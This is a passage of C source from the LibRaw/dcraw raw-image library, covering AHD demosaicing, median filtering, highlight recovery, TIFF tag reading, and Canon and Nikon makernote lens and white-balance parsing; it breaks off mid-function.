homo = (char (*)[TS][2]) (buffer + 24*TS*TS);
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
#pragma omp for schedule(dynamic)
#endif
#endif
for (top=2; top < height-5; top += TS-6){
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
if(0== omp_get_thread_num())
#endif
if(callbacks.progress_cb) {
int rr = (*callbacks.progress_cb)(callbacks.progresscb_data,LIBRAW_PROGRESS_INTERPOLATE,top-2,height-7);
if(rr)
terminate_flag = 1;
}
#endif
for (left=2; !terminate_flag && (left < width-5); left += TS-6) {
ahd_interpolate_green_h_and_v(top, left, rgb);
ahd_interpolate_r_and_b_and_convert_to_cielab(top, left, rgb, lab);
ahd_interpolate_build_homogeneity_map(top, left, lab, homo);
ahd_interpolate_combine_homogeneous_pixels(top, left, rgb, homo);
}
}
free (buffer);
}
#ifdef LIBRAW_LIBRARY_BUILD
if(terminate_flag)
throw LIBRAW_EXCEPTION_CANCELLED_BY_CALLBACK;
#endif
}
#else
void CLASS ahd_interpolate()
{
int i, j, top, left, row, col, tr, tc, c, d, val, hm[2];
static const int dir[4] = { -1, 1, -TS, TS };
unsigned ldiff[2][4], abdiff[2][4], leps, abeps;
ushort (*rgb)[TS][TS][3], (*rix)[3], (*pix)[4];
short (*lab)[TS][TS][3], (*lix)[3];
char (*homo)[TS][TS], *buffer;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("AHD interpolation...\n"));
#endif
cielab (0,0);
border_interpolate(5);
buffer = (char *) malloc (26*TS*TS);
merror (buffer, "ahd_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*)[TS][TS][3])(buffer + 12*TS*TS);
homo = (char (*)[TS][TS]) (buffer + 24*TS*TS);
for (top=2; top < height-5; top += TS-6)
for (left=2; left < width-5; left += TS-6) {
/* Interpolate green horizontally and vertically: */
for (row=top; row < top+TS && row < height-2; row++) {
col = left + (FC(row,left) & 1);
for (c = FC(row,col); col < left+TS && col < width-2; col+=2) {
pix = image + row*width+col;
val = ((pix[-1][1] + pix[0][c] + pix[1][1]) * 2
- pix[-2][c] - pix[2][c]) >> 2;
rgb[0][row-top][col-left][1] = ULIM(val,pix[-1][1],pix[1][1]);
val = ((pix[-width][1] + pix[0][c] + pix[width][1]) * 2
- pix[-2*width][c] - pix[2*width][c]) >> 2;
rgb[1][row-top][col-left][1] = ULIM(val,pix[-width][1],pix[width][1]);
}
}
/* Interpolate red and blue, and convert to CIELab: */
for (d=0; d < 2; d++)
for (row=top+1; row < top+TS-1 && row < height-3; row++)
for (col=left+1; col < left+TS-1 && col < width-3; col++) {
pix = image + row*width+col;
rix = &rgb[d][row-top][col-left];
lix = &lab[d][row-top][col-left];
if ((c = 2 - FC(row,col)) == 1) {
c = FC(row+1,col);
val = pix[0][1] + (( pix[-1][2-c] + pix[1][2-c]
- rix[-1][1] - rix[1][1] ) >> 1);
rix[0][2-c] = CLIP(val);
val = pix[0][1] + (( pix[-width][c] + pix[width][c]
- rix[-TS][1] - rix[TS][1] ) >> 1);
} else
val = rix[0][1] + (( pix[-width-1][c] + pix[-width+1][c]
+ pix[+width-1][c] + pix[+width+1][c]
- rix[-TS-1][1] - rix[-TS+1][1]
- rix[+TS-1][1] - rix[+TS+1][1] + 1) >> 2);
rix[0][c] = CLIP(val);
c = FC(row,col);
rix[0][c] = pix[0][c];
cielab (rix[0],lix[0]);
}
/* Build homogeneity maps from the CIELab images: */
memset (homo, 0, 2*TS*TS);
for (row=top+2; row < top+TS-2 && row < height-4; row++) {
tr = row-top;
for (col=left+2; col < left+TS-2 && col < width-4; col++) {
tc = col-left;
for (d=0; d < 2; d++) {
lix = &lab[d][tr][tc];
for (i=0; i < 4; i++) {
ldiff[d][i] = ABS(lix[0][0]-lix[dir[i]][0]);
abdiff[d][i] = SQR(lix[0][1]-lix[dir[i]][1])
+ SQR(lix[0][2]-lix[dir[i]][2]);
}
}
leps = MIN(MAX(ldiff[0][0],ldiff[0][1]),
MAX(ldiff[1][2],ldiff[1][3]));
abeps = MIN(MAX(abdiff[0][0],abdiff[0][1]),
MAX(abdiff[1][2],abdiff[1][3]));
for (d=0; d < 2; d++)
for (i=0; i < 4; i++)
if (ldiff[d][i] <= leps && abdiff[d][i] <= abeps)
homo[d][tr][tc]++;
}
}
/* Combine the most homogenous pixels for the final result: */
for (row=top+3; row < top+TS-3 && row < height-5; row++) {
tr = row-top;
for (col=left+3; col < left+TS-3 && col < width-5; col++) {
tc = col-left;
for (d=0; d < 2; d++)
for (hm[d]=0, i=tr-1; i <= tr+1; i++)
for (j=tc-1; j <= tc+1; j++)
hm[d] += homo[d][i][j];
if (hm[0] != hm[1])
FORC3 image[row*width+col][c] = rgb[hm[1] > hm[0]][tr][tc][c];
else
FORC3 image[row*width+col][c] =
(rgb[0][tr][tc][c] + rgb[1][tr][tc][c]) >> 1;
}
}
}
free (buffer);
}
#endif
#undef TS
void CLASS median_filter()
{
ushort (*pix)[4];
int pass, c, i, j, k, med[9];
static const uchar opt[] = /* Optimal 9-element median search */
{ 1,2, 4,5, 7,8, 0,1, 3,4, 6,7, 1,2, 4,5, 7,8,
0,3, 5,8, 4,7, 3,6, 1,4, 2,5, 4,7, 4,2, 6,4, 4,2 };
for (pass=1; pass <= med_passes; pass++) {
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_MEDIAN_FILTER,pass-1,med_passes);
#endif
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Median filter pass %d...\n"), pass);
#endif
for (c=0; c < 3; c+=2) {
for (pix = image; pix < image+width*height; pix++)
pix[0][3] = pix[0][c];
for (pix = image+width; pix < image+width*(height-1); pix++) {
if ((pix-image+1) % width < 2) continue;
for (k=0, i = -width; i <= width; i += width)
for (j = i-1; j <= i+1; j++)
med[k++] = pix[j][3] - pix[j][1];
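	/* opt[] encodes a fixed compare/swap network; after it runs, med[4] holds the
	   median of the nine neighbourhood differences. */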
for (i=0; i < sizeof opt; i+=2)
if (med[opt[i]] > med[opt[i+1]])
SWAP (med[opt[i]] , med[opt[i+1]]);
pix[0][c] = CLIP(med[4] + pix[0][1]);
}
}
}
}
void CLASS blend_highlights()
{
int clip=INT_MAX, row, col, c, i, j;
static const float trans[2][4][4] =
{ { { 1,1,1 }, { 1.7320508,-1.7320508,0 }, { -1,-1,2 } },
{ { 1,1,1,1 }, { 1,-1,1,-1 }, { 1,1,-1,-1 }, { 1,-1,-1,1 } } };
static const float itrans[2][4][4] =
{ { { 1,0.8660254,-0.5 }, { 1,-0.8660254,-0.5 }, { 1,0,1 } },
{ { 1,1,1,1 }, { 1,-1,1,-1 }, { 1,1,-1,-1 }, { 1,-1,-1,1 } } };
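  /* trans/itrans map 3- or 4-colour camera values into a luminance/chrominance basis
     and back; below, the chrominance of the unclipped value is rescaled to the
     magnitude of the clipped one, taming blown channels while preserving hue. */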
float cam[2][4], lab[2][4], sum[2], chratio;
if ((unsigned) (colors-3) > 1) return;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Blending highlights...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,0,2);
#endif
FORCC if (clip > (i = 65535*pre_mul[c])) clip = i;
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
FORCC if (image[row*width+col][c] > clip) break;
if (c == colors) continue;
FORCC {
cam[0][c] = image[row*width+col][c];
cam[1][c] = MIN(cam[0][c],clip);
}
for (i=0; i < 2; i++) {
FORCC for (lab[i][c]=j=0; j < colors; j++)
lab[i][c] += trans[colors-3][c][j] * cam[i][j];
for (sum[i]=0,c=1; c < colors; c++)
sum[i] += SQR(lab[i][c]);
}
chratio = sqrt(sum[1]/sum[0]);
for (c=1; c < colors; c++)
lab[0][c] *= chratio;
FORCC for (cam[0][c]=j=0; j < colors; j++)
cam[0][c] += itrans[colors-3][c][j] * lab[0][j];
FORCC image[row*width+col][c] = cam[0][c] / colors;
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,1,2);
#endif
}
#define SCALE (4 >> shrink)
void CLASS recover_highlights()
{
float *map, sum, wgt, grow;
int hsat[4], count, spread, change, val, i;
unsigned high, wide, mrow, mcol, row, col, kc, c, d, y, x;
ushort *pixel;
static const signed char dir[8][2] =
{ {-1,-1}, {-1,0}, {-1,1}, {0,1}, {1,1}, {1,0}, {1,-1}, {0,-1} };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Rebuilding highlights...\n"));
#endif
grow = pow (2.0, 4-highlight);
FORCC hsat[c] = 32000 * pre_mul[c];
for (kc=0, c=1; c < colors; c++)
if (pre_mul[kc] < pre_mul[c]) kc = c;
high = height / SCALE;
wide = width / SCALE;
map = (float *) calloc (high, wide*sizeof *map);
merror (map, "recover_highlights()");
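  /* map holds, per SCALE x SCALE cell, the ratio of the clipped channel c to the
     brightest (kc) channel where c is saturated and kc is bright; empty cells are
     filled by the neighbour-spreading loop, and the ratio is finally used to rebuild
     clipped pixels from the kc channel. */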
FORCC if (c != kc) {
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,c-1,colors-1);
#endif
memset (map, 0, high*wide*sizeof *map);
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
sum = wgt = count = 0;
for (row = mrow*SCALE; row < (mrow+1)*SCALE; row++)
for (col = mcol*SCALE; col < (mcol+1)*SCALE; col++) {
pixel = image[row*width+col];
if (pixel[c] / hsat[c] == 1 && pixel[kc] > 24000) {
sum += pixel[c];
wgt += pixel[kc];
count++;
}
}
if (count == SCALE*SCALE)
map[mrow*wide+mcol] = sum / wgt;
}
for (spread = 32/grow; spread--; ) {
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
if (map[mrow*wide+mcol]) continue;
sum = count = 0;
for (d=0; d < 8; d++) {
y = mrow + dir[d][0];
x = mcol + dir[d][1];
if (y < high && x < wide && map[y*wide+x] > 0) {
sum += (1 + (d & 1)) * map[y*wide+x];
count += 1 + (d & 1);
}
}
if (count > 3)
map[mrow*wide+mcol] = - (sum+grow) / (count+grow);
}
for (change=i=0; i < high*wide; i++)
if (map[i] < 0) {
map[i] = -map[i];
change = 1;
}
if (!change) break;
}
for (i=0; i < high*wide; i++)
if (map[i] == 0) map[i] = 1;
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
for (row = mrow*SCALE; row < (mrow+1)*SCALE; row++)
for (col = mcol*SCALE; col < (mcol+1)*SCALE; col++) {
pixel = image[row*width+col];
if (pixel[c] / hsat[c] > 1) {
val = pixel[kc] * map[mrow*wide+mcol];
if (pixel[c] < val) pixel[c] = CLIP(val);
}
}
}
}
free (map);
}
#undef SCALE
void CLASS tiff_get (unsigned base,
unsigned *tag, unsigned *type, unsigned *len, unsigned *save)
{
*tag = get2();
*type = get2();
*len = get4();
*save = ftell(ifp) + 4;
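  /* "11124811248484"[*type] maps the TIFF field type to its size in bytes; if the
     value does not fit in the 4-byte inline field, seek to the offset it points to. */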
if (*len * ("11124811248484"[*type < 14 ? *type:0]-'0') > 4)
fseek (ifp, get4()+base, SEEK_SET);
}
void CLASS parse_thumb_note (int base, unsigned toff, unsigned tlen)
{
unsigned entries, tag, type, len, save;
entries = get2();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if (tag == toff) thumb_offset = get4()+base;
if (tag == tlen) thumb_length = get4();
fseek (ifp, save, SEEK_SET);
}
}
//@end COMMON
int CLASS parse_tiff_ifd (int base);
//@out COMMON
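/* powf with the exponent clamped: values of b outside +/-limup return 0 instead of
   overflowing; libraw_powf64() applies a limit of 64. */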
static float powf_lim(float a, float b, float limup)
{
return (b>limup || b < -limup)?0.f:powf(a,b);
}
static float libraw_powf64(float a, float b)
{
return powf_lim(a,b,64.f);
}
#ifdef LIBRAW_LIBRARY_BUILD
static float my_roundf(float x) {
float t;
if (x >= 0.0) {
t = ceilf(x);
if (t - x > 0.5) t -= 1.0;
return t;
} else {
t = ceilf(-x);
if (t + x > 0.5) t -= 1.0;
return -t;
}
}
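/* Canon stores apertures as 64*log2(f-number); the sentinels 0xffe0 and 0x7fff are
   treated as "no value" and yield 0. */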
static float _CanonConvertAperture(ushort in)
{
if ((in == (ushort)0xffe0) || (in == (ushort)0x7fff)) return 0.0f;
return libraw_powf64(2.0, in/64.0);
}
static float _CanonConvertEV (short in)
{
short EV, Sign, Frac;
float Frac_f;
EV = in;
if (EV < 0) {
EV = -EV;
Sign = -1;
} else {
Sign = 1;
}
Frac = EV & 0x1f;
EV -= Frac; // remove fraction
if (Frac == 0x0c) { // convert 1/3 and 2/3 codes
Frac_f = 32.0f / 3.0f;
} else if (Frac == 0x14) {
Frac_f = 64.0f / 3.0f;
} else Frac_f = (float) Frac;
return ((float)Sign * ((float)EV + Frac_f))/32.0f;
}
void CLASS setCanonBodyFeatures (unsigned id)
{
imgdata.lens.makernotes.CamID = id;
if (
(id == 0x80000001) || // 1D
(id == 0x80000174) || // 1D2
(id == 0x80000232) || // 1D2N
(id == 0x80000169) || // 1D3
(id == 0x80000281) // 1D4
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSH;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
}
else
if (
(id == 0x80000167) || // 1Ds
(id == 0x80000188) || // 1Ds2
(id == 0x80000215) || // 1Ds3
(id == 0x80000269) || // 1DX
(id == 0x80000328) || // 1DX2
(id == 0x80000324) || // 1DC
(id == 0x80000213) || // 5D
(id == 0x80000218) || // 5D2
(id == 0x80000285) || // 5D3
(id == 0x80000349) || // 5D4
(id == 0x80000382) || // 5DS
(id == 0x80000401) || // 5DS R
(id == 0x80000302) // 6D
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
}
else
if (
(id == 0x80000331) || // M
(id == 0x80000355) || // M2
(id == 0x80000374) || // M3
(id == 0x80000384) || // M10
(id == 0x80000394) // M5
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF_M;
}
else
if (
(id == 0x01140000) || // D30
(id == 0x01668000) || // D60
(id > 0x80000000)
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Unknown;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS processCanonCameraInfo (unsigned id, uchar *CameraInfo, unsigned maxlen)
{
ushort iCanonLensID = 0, iCanonMaxFocal = 0, iCanonMinFocal = 0, iCanonLens = 0, iCanonCurFocal = 0, iCanonFocalType = 0;
if(maxlen<16) return; // too short, so broken
CameraInfo[0] = 0;
CameraInfo[1] = 0;
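  /* The iCanon* variables below are byte offsets into the model-specific CameraInfo
     blob; each one is checked against maxlen before it is read. */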
switch (id) {
case 0x80000001: // 1D
case 0x80000167: // 1DS
iCanonCurFocal = 10;
iCanonLensID = 13;
iCanonMinFocal = 14;
iCanonMaxFocal = 16;
if (!imgdata.lens.makernotes.CurFocal)
imgdata.lens.makernotes.CurFocal = sget2(CameraInfo + iCanonCurFocal);
if (!imgdata.lens.makernotes.MinFocal)
imgdata.lens.makernotes.MinFocal = sget2(CameraInfo + iCanonMinFocal);
if (!imgdata.lens.makernotes.MaxFocal)
imgdata.lens.makernotes.MaxFocal = sget2(CameraInfo + iCanonMaxFocal);
break;
case 0x80000174: // 1DMkII
case 0x80000188: // 1DsMkII
iCanonCurFocal = 9;
iCanonLensID = 12;
iCanonMinFocal = 17;
iCanonMaxFocal = 19;
iCanonFocalType = 45;
break;
case 0x80000232: // 1DMkII N
iCanonCurFocal = 9;
iCanonLensID = 12;
iCanonMinFocal = 17;
iCanonMaxFocal = 19;
break;
case 0x80000169: // 1DMkIII
case 0x80000215: // 1DsMkIII
iCanonCurFocal = 29;
iCanonLensID = 273;
iCanonMinFocal = 275;
iCanonMaxFocal = 277;
break;
case 0x80000281: // 1DMkIV
iCanonCurFocal = 30;
iCanonLensID = 335;
iCanonMinFocal = 337;
iCanonMaxFocal = 339;
break;
case 0x80000269: // 1D X
iCanonCurFocal = 35;
iCanonLensID = 423;
iCanonMinFocal = 425;
iCanonMaxFocal = 427;
break;
case 0x80000213: // 5D
iCanonCurFocal = 40;
if (!sget2Rev(CameraInfo + 12)) iCanonLensID = 151;
else iCanonLensID = 12;
iCanonMinFocal = 147;
iCanonMaxFocal = 149;
break;
case 0x80000218: // 5DMkII
iCanonCurFocal = 30;
iCanonLensID = 230;
iCanonMinFocal = 232;
iCanonMaxFocal = 234;
break;
case 0x80000285: // 5DMkIII
iCanonCurFocal = 35;
iCanonLensID = 339;
iCanonMinFocal = 341;
iCanonMaxFocal = 343;
break;
case 0x80000302: // 6D
iCanonCurFocal = 35;
iCanonLensID = 353;
iCanonMinFocal = 355;
iCanonMaxFocal = 357;
break;
case 0x80000250: // 7D
iCanonCurFocal = 30;
iCanonLensID = 274;
iCanonMinFocal = 276;
iCanonMaxFocal = 278;
break;
case 0x80000190: // 40D
iCanonCurFocal = 29;
iCanonLensID = 214;
iCanonMinFocal = 216;
iCanonMaxFocal = 218;
iCanonLens = 2347;
break;
case 0x80000261: // 50D
iCanonCurFocal = 30;
iCanonLensID = 234;
iCanonMinFocal = 236;
iCanonMaxFocal = 238;
break;
case 0x80000287: // 60D
iCanonCurFocal = 30;
iCanonLensID = 232;
iCanonMinFocal = 234;
iCanonMaxFocal = 236;
break;
case 0x80000325: // 70D
iCanonCurFocal = 35;
iCanonLensID = 358;
iCanonMinFocal = 360;
iCanonMaxFocal = 362;
break;
case 0x80000176: // 450D
iCanonCurFocal = 29;
iCanonLensID = 222;
iCanonLens = 2355;
break;
case 0x80000252: // 500D
iCanonCurFocal = 30;
iCanonLensID = 246;
iCanonMinFocal = 248;
iCanonMaxFocal = 250;
break;
case 0x80000270: // 550D
iCanonCurFocal = 30;
iCanonLensID = 255;
iCanonMinFocal = 257;
iCanonMaxFocal = 259;
break;
case 0x80000286: // 600D
case 0x80000288: // 1100D
iCanonCurFocal = 30;
iCanonLensID = 234;
iCanonMinFocal = 236;
iCanonMaxFocal = 238;
break;
case 0x80000301: // 650D
case 0x80000326: // 700D
iCanonCurFocal = 35;
iCanonLensID = 295;
iCanonMinFocal = 297;
iCanonMaxFocal = 299;
break;
case 0x80000254: // 1000D
iCanonCurFocal = 29;
iCanonLensID = 226;
iCanonMinFocal = 228;
iCanonMaxFocal = 230;
iCanonLens = 2359;
break;
}
if (iCanonFocalType)
{
if(iCanonFocalType>=maxlen) return; // broken;
imgdata.lens.makernotes.FocalType = CameraInfo[iCanonFocalType];
if (!imgdata.lens.makernotes.FocalType) // zero means 'fixed' here, replacing with standard '1'
imgdata.lens.makernotes.FocalType = 1;
}
if (!imgdata.lens.makernotes.CurFocal)
{
if(iCanonCurFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.CurFocal = sget2Rev(CameraInfo + iCanonCurFocal);
}
if (!imgdata.lens.makernotes.LensID)
{
if(iCanonLensID>=maxlen) return; // broken;
imgdata.lens.makernotes.LensID = sget2Rev(CameraInfo + iCanonLensID);
}
if (!imgdata.lens.makernotes.MinFocal)
{
if(iCanonMinFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.MinFocal = sget2Rev(CameraInfo + iCanonMinFocal);
}
if (!imgdata.lens.makernotes.MaxFocal)
{
if(iCanonMaxFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.MaxFocal = sget2Rev(CameraInfo + iCanonMaxFocal);
}
if (!imgdata.lens.makernotes.Lens[0] && iCanonLens) {
if(iCanonLens+64>=maxlen) return; // broken;
if (CameraInfo[iCanonLens] < 65) // non-Canon lens
{
memcpy(imgdata.lens.makernotes.Lens, CameraInfo + iCanonLens, 64);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "EF-S", 4))
{
memcpy(imgdata.lens.makernotes.Lens, "EF-S ", 5);
      memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF-S", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_S;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "TS-E", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "TS-E ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "TS-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "MP-E", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "MP-E ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "MP-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "EF-M", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "EF-M ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF-M", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_M;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else {
memcpy(imgdata.lens.makernotes.Lens, CameraInfo + iCanonLens, 2);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF", 2);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
imgdata.lens.makernotes.Lens[2] = 32;
memcpy(imgdata.lens.makernotes.Lens + 3, CameraInfo + iCanonLens + 2, 62);
}
}
return;
}
void CLASS Canon_CameraSettings ()
{
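  /* CanonCameraSettings is an array of 16-bit values; the initial fseek and the bare
     get2() calls skip entries that are not recorded here. */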
fseek(ifp, 10, SEEK_CUR);
imgdata.shootinginfo.DriveMode = get2(); get2();
imgdata.shootinginfo.FocusMode = get2();
fseek(ifp, 18, SEEK_CUR);
imgdata.shootinginfo.MeteringMode = get2(); get2();
imgdata.shootinginfo.AFPoint = get2();
imgdata.shootinginfo.ExposureMode = get2(); get2();
imgdata.lens.makernotes.LensID = get2();
imgdata.lens.makernotes.MaxFocal = get2();
imgdata.lens.makernotes.MinFocal = get2();
imgdata.lens.makernotes.CanonFocalUnits = get2();
if (imgdata.lens.makernotes.CanonFocalUnits > 1)
{
imgdata.lens.makernotes.MaxFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
imgdata.lens.makernotes.MinFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
imgdata.lens.makernotes.MaxAp = _CanonConvertAperture(get2());
imgdata.lens.makernotes.MinAp = _CanonConvertAperture(get2());
fseek(ifp, 12, SEEK_CUR);
imgdata.shootinginfo.ImageStabilization = get2();
}
void CLASS Canon_WBpresets (int skip1, int skip2)
{
int c;
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
if (skip2) fseek(ifp, skip2, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
return;
}
void CLASS Canon_WBCTpresets (short WBCTversion)
{
if (WBCTversion == 0)
    for (int i=0; i<15; i++) // tint, as shot R, as shot B, CCT
{
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f /fMAX(get2(),1.f) ;
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f /fMAX(get2(),1.f);
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if (WBCTversion == 1)
    for (int i=0; i<15; i++) // as shot R, as shot B, tint, CCT
{
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f / fMAX(get2(),1.f);
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f / fMAX(get2(),1.f);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if ((WBCTversion == 2) &&
((unique_id == 0x80000374) || // M3
(unique_id == 0x80000384) || // M10
(unique_id == 0x80000394) || // M5
(unique_id == 0x03970000))) // G7 X Mark II
    for (int i=0; i<15; i++) // tint, offset, as shot R, as shot B, CCT
{
fseek (ifp, 2, SEEK_CUR);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f / fMAX(1.f,get2());
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f / fMAX(1.f,get2());
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if ((WBCTversion == 2) &&
((unique_id == 0x03950000) || (unique_id == 0x03930000))) // G5 X, G9 X
    for (int i=0; i<15; i++) // tint, offset, as shot R, as shot B, CCT
{
fseek (ifp, 2, SEEK_CUR);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = (float)get2() / 512.0f;
imgdata.color.WBCT_Coeffs[i][3] = (float)get2() / 512.0f;
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
return;
}
void CLASS processNikonLensData (uchar *LensData, unsigned len)
{
ushort i;
if (!(imgdata.lens.nikon.NikonLensType & 0x01))
{
imgdata.lens.makernotes.LensFeatures_pre[0] = 'A';
imgdata.lens.makernotes.LensFeatures_pre[1] = 'F';
}
else
{
imgdata.lens.makernotes.LensFeatures_pre[0] = 'M';
imgdata.lens.makernotes.LensFeatures_pre[1] = 'F';
}
if (imgdata.lens.nikon.NikonLensType & 0x02)
{
if (imgdata.lens.nikon.NikonLensType & 0x04)
imgdata.lens.makernotes.LensFeatures_suf[0] = 'G';
else
imgdata.lens.makernotes.LensFeatures_suf[0] = 'D';
imgdata.lens.makernotes.LensFeatures_suf[1] = ' ';
}
if (imgdata.lens.nikon.NikonLensType & 0x08)
{
imgdata.lens.makernotes.LensFeatures_suf[2] = 'V';
imgdata.lens.makernotes.LensFeatures_suf[3] = 'R';
}
if (imgdata.lens.nikon.NikonLensType & 0x10)
{
imgdata.lens.makernotes.LensMount = imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_CX;
imgdata.lens.makernotes.CameraFormat = imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_1INCH;
}
else
imgdata.lens.makernotes.LensMount = imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_F;
if (imgdata.lens.nikon.NikonLensType & 0x20)
{
strcpy(imgdata.lens.makernotes.Adapter, "FT-1");
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Nikon_F;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_CX;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_1INCH;
}
imgdata.lens.nikon.NikonLensType = imgdata.lens.nikon.NikonLensType & 0xdf;
if (len < 20) {
    switch (len) {
    case 9:
      i = 2;
      break;
    case 15:
      i = 7;
      break;
    case 16:
      i = 8;
      break;
    default:
      return; /* unknown short LensData layout: otherwise i is used uninitialized below */
    }
imgdata.lens.nikon.NikonLensIDNumber = LensData[i];
imgdata.lens.nikon.NikonLensFStops = LensData[i + 1];
imgdata.lens.makernotes.LensFStops = (float)imgdata.lens.nikon.NikonLensFStops /12.0f;
if (fabsf(imgdata.lens.makernotes.MinFocal) < 1.1f)
{
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 2])
imgdata.lens.makernotes.MinFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i + 2] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 3])
imgdata.lens.makernotes.MaxFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i + 3] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 4])
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(2.0f, (float)LensData[i + 4] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 5])
